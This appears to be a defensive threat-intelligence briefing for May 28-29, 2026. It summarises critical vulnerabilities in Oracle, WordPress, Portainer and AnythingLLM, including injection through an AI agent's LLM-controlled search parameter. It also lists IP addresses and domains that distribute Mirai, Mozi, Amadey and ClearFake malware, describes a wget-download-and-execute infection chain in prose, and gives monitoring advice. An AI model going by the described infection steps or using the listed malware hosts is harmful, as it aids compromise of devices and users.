This briefing covers the 24-hour period from May 28-29, 2026, revealing a landscape dominated by critical vulnerabilities in enterprise systems and sustained malware distribution campaigns. The most significant findings include multiple CVSS 10.0 and 9.8+ vulnerabilities affecting Oracle products, WordPress plugins, and various development frameworks that could enable complete system compromise. Oracle REST Data Services and E-Business Suite products face particularly severe exposure with multiple critical flaws allowing unauthenticated remote code execution and privilege escalation.
Malware distribution activity remains robust with 50 malicious URLs identified, primarily distributing Mirai botnet variants and Mozi malware targeting IoT and router devices. The infrastructure at 176.65.139.111 and 176.65.139.36 shows coordinated multi-architecture Mirai distribution, while ConnectWise ScreenConnect tooling abuse was observed for initial access. ClearFake campaigns continue leveraging fake update delivery mechanisms. The concentration of ELF binaries targeting MIPS, ARM, and x86 architectures indicates ongoing efforts to compromise edge devices for DDoS and proxy operations.
Organizations should prioritize immediate patching of Oracle products, particularly REST Data Services versions 24.2.0-26.1.0 and E-Business Suite components. Secondary focus should address WordPress ACF Extended plugin updates and development framework vulnerabilities. Network defenders should enhance monitoring for Mirai/Mozi infection indicators and implement strict egress filtering to prevent IoT device compromise.
Multiple CVSS 9.8-10.0 vulnerabilities identified across Oracle products, WordPress plugins, and development frameworks enabling remote code execution and complete system compromise
Easily exploitable vulnerability in Oracle REST Data Services Backend-as-a-Service component (versions 24.2.0-26.1.0) allows unauthenticated attackers with network access via HTTPS to achieve complete compromise. Maximum severity rating indicates potential for full system control without authentication.
Marten's full-text search APIs (prior to 8.36.1) fail to parameterize user-supplied regConfig parameters, directly interpolating them into SQL queries. Every code path exposing regConfig to untrusted input is vulnerable to SQL injection allowing complete database compromise.
Oracle E-Business Suite Payments component (versions 12.2.3-12.2.15) contains easily exploitable vulnerability allowing unauthenticated attackers with HTTP network access to compromise the File Transmission component, potentially exposing payment processing systems.
Advanced Custom Fields: Extended plugin (all versions up to 0.9.2.5) contains validation bypass vulnerability in after_validate_save_post() function that unconditionally trusts attacker-controlled _acf_post_id parameter, enabling privilege escalation to administrative access.
Oracle REST Data Services Core component (versions 24.2.0-26.1.0) vulnerable to compromise by low-privileged attackers via HTTPS. While requiring authentication, successful exploitation enables attacks beyond the vulnerable component scope.
Separate critical vulnerability in Oracle REST Data Services Core (versions 24.2.0-26.1.0) allowing low-privileged authenticated attackers to compromise the system via HTTPS with impacts extending beyond the vulnerable component.
Exposed methods allow authenticated users to create and execute arbitrary JavaScript code on the server with full system access. Commands execute with root privileges enabling complete system compromise through a simple authenticated interface.
Difficult to exploit vulnerability in Oracle Database Server Net Service component (versions 23.4.0-23.26.2) allows unauthenticated attackers with network access via TLS to compromise the system. While difficult to exploit, successful attacks have severe cross-component impact.
Multiple high-severity vulnerabilities affecting Oracle E-Business Suite components including Payroll, Universal Work Queue, and iAssets modules enabling privilege escalation and unauthorized access
Oracle E-Business Suite Universal Work Queue component (versions 12.2.3-12.2.15) vulnerable to compromise by low-privileged attackers via HTTP. Work Provider Site Level Administration component easily exploitable for complete system compromise.
Oracle iAssets component Internal Operations (versions 12.2.3-12.2.15) easily exploitable by low-privileged attackers via HTTP, with successful attacks extending beyond the vulnerable component to affect broader E-Business Suite deployment.
Oracle E-Business Suite Internet Procurement Connector (versions 12.2.3-12.2.15) allows unauthenticated attackers with HTTP network access to compromise Internal Operations component, potentially exposing procurement systems and data.
Oracle Payroll Self Service Manager component (versions 12.2.3-12.2.15) vulnerable to compromise by low-privileged attackers via HTTP, potentially enabling unauthorized access to payroll information and operations.
Oracle Payroll Internal Operations component (versions 12.2.3-12.2.15) easily exploitable by low-privileged attackers via HTTPS, enabling unauthorized payroll system access and potential data manipulation.
Oracle E-Business Suite Flow Manufacturing Security component (versions 12.2.9-12.2.15) allows low-privileged attackers with SQL network access to compromise the system, affecting manufacturing operations integrity.
High-severity vulnerabilities in popular development frameworks and applications including path traversal, command injection, and configuration manipulation issues
Portainer Community Edition (versions 2.33.0 to before 2.33.8, 2.39.2, 2.41.0) proxies Kubernetes cluster requests through middleware layer without proper authentication enforcement, potentially exposing cluster management interfaces to unauthorized access.
Portainer Community Edition (versions 2.33.0 to before 2.33.8, 2.39.2, 2.41.0) environment-level 'Disable bind mounts for non-administrators' setting can be bypassed, allowing unauthorized container escape and host filesystem access.
LinkAce (prior to 2.5.6) setup database configuration flow accepts attacker-controlled database credentials and writes them to .env file without escaping, enabling remote configuration manipulation on uninitialized instances.
Billy filesystem abstraction for Go (prior to 5.9.0) contains multiple path traversal vulnerabilities across components due to insufficient path sanitization. Crafted paths using '..' sequences can escape intended base directories.
AnythingLLM (prior to 1.13.0) filesystem-search-files agent skill passes LLM-controlled pattern parameter to ripgrep as positional argument without end-of-options separator, enabling command injection through specially crafted search patterns.
Better Auth (prior to 1.4.17 and 1.5.0-beta.9) HTTP rate limiter keys requests by exact textual IP from x-forwarded-for header. IPv6 clients controlling typical /64 subnets can bypass rate limiting through IP rotation.
Usagi-org ai-goofish-monitor contains unauthenticated arbitrary file read in GET /api/prompts/{filename} endpoint on Windows deployments. Attackers can read arbitrary files using absolute Windows paths or backslash-based traversal sequences.
Lakeside SysTrack Agent (prior to 11.2.1.28, 11.3.0.38, 11.4.0.24, 11.5.0.15) contains out-of-bounds read vulnerability in Command ID 30 UDP packet handler. Remote attackers can crash the application via specially crafted UDP packets.
Active Mirai botnet infrastructure distributing malware across multiple architectures from 176.65.139.x network, targeting IoT devices and routers for botnet recruitment
Coordinated malware distribution from 176.65.139.111 hosting Mirai ELF binaries for ARM (arm, arm5, arm7), MIPS (mpsl), x86, x86_64, and i686 architectures. User-agent indicates wget-based download suggesting automated infection scripts targeting diverse device types.
Secondary distribution node at 176.65.139.36 serving Mirai variants for PPC, x86, MIPS, ARM (arm, arm5, arm6, arm7), SH4, M68K, MPSL, and SPC architectures. Comprehensive architecture coverage indicates sophisticated IoT botnet expansion targeting embedded systems, routers, and network equipment.
Distribution server at 45.85.218.109 hosting 'iran.*' named Mirai binaries across 14 architectures plus payload.sh loader script. Naming convention suggests geographically-targeted or themed campaign. Comprehensive architecture support (including MIPS router, ARC, SPARC) indicates broad IoT targeting.
Continued Mozi botnet activity targeting MIPS-based devices alongside ConnectWise tool abuse and ClearFake social engineering campaigns
Ten distinct IP addresses distributing Mozi botnet malware targeting 32-bit MIPS and ARM ELF binaries. Sources include 110.36.65.9, 219.156.100.198, 123.188.105.51, 110.167.80.155, 110.37.113.30, 222.137.145.223, 42.237.48.166, 182.124.160.52, 110.39.235.153, and 61.53.123.9. Primary targets are routers and IoT devices with MIPS processors.
Two URLs hosting ConnectWise ScreenConnect client executables (support.client.exe and ScreenConnect.ClientSetup.exe) on 178.16.55.11 via HTTPS. Legitimate remote access tool frequently abused for initial access and persistence in intrusion operations.
ClearFake malware distribution via visszateritok.net and visszateritok.hu domains using UUID-based URLs. ClearFake campaigns typically involve fake browser update prompts to deliver malware through social engineering, targeting users in specific geographic regions.
URL at 91.92.242.236 distributing file_f49922ef9bcf1f82.exe identified as payload dropped by Amadey malware loader. Amadey typically serves as initial infection vector for additional malware deployment including ransomware, stealers, and banking trojans.
Distribution of certificado.exe (Spanish for 'certificate') from 178.16.54.243 via HTTPS using wget user-agent. File naming suggests social engineering approach targeting Spanish-speaking users with fake certificate or security update themes.
Analysis of observed attack patterns reveals multi-architecture malware distribution, exploitation of legitimate tools, and geographic targeting strategies
Threat actors deploying comprehensive multi-architecture malware sets (12-14 variants per campaign) targeting ARM, MIPS, x86, PowerPC, SPARC, SH4, M68K, and ARC processors. This approach maximizes infection potential across diverse IoT ecosystems including routers, NAS devices, DVRs, and embedded systems. Single distribution servers hosting complete architecture sets indicates automated deployment infrastructure.
Consistent wget user-agent strings across malware distribution URLs indicates command-line based download mechanisms. Infection typically proceeds through: initial compromise → shell command execution → wget/curl download → chmod +x → execution. Defenders should monitor for wget processes spawned by unexpected parent processes and downloading from non-standard ports.
ConnectWise ScreenConnect distribution represents continued trend of abusing legitimate remote administration tools. These tools provide persistent access, encrypted communications, and reduced detection likelihood compared to custom RATs. Organizations should implement strict whitelisting for remote access tools and monitor for unauthorized installations.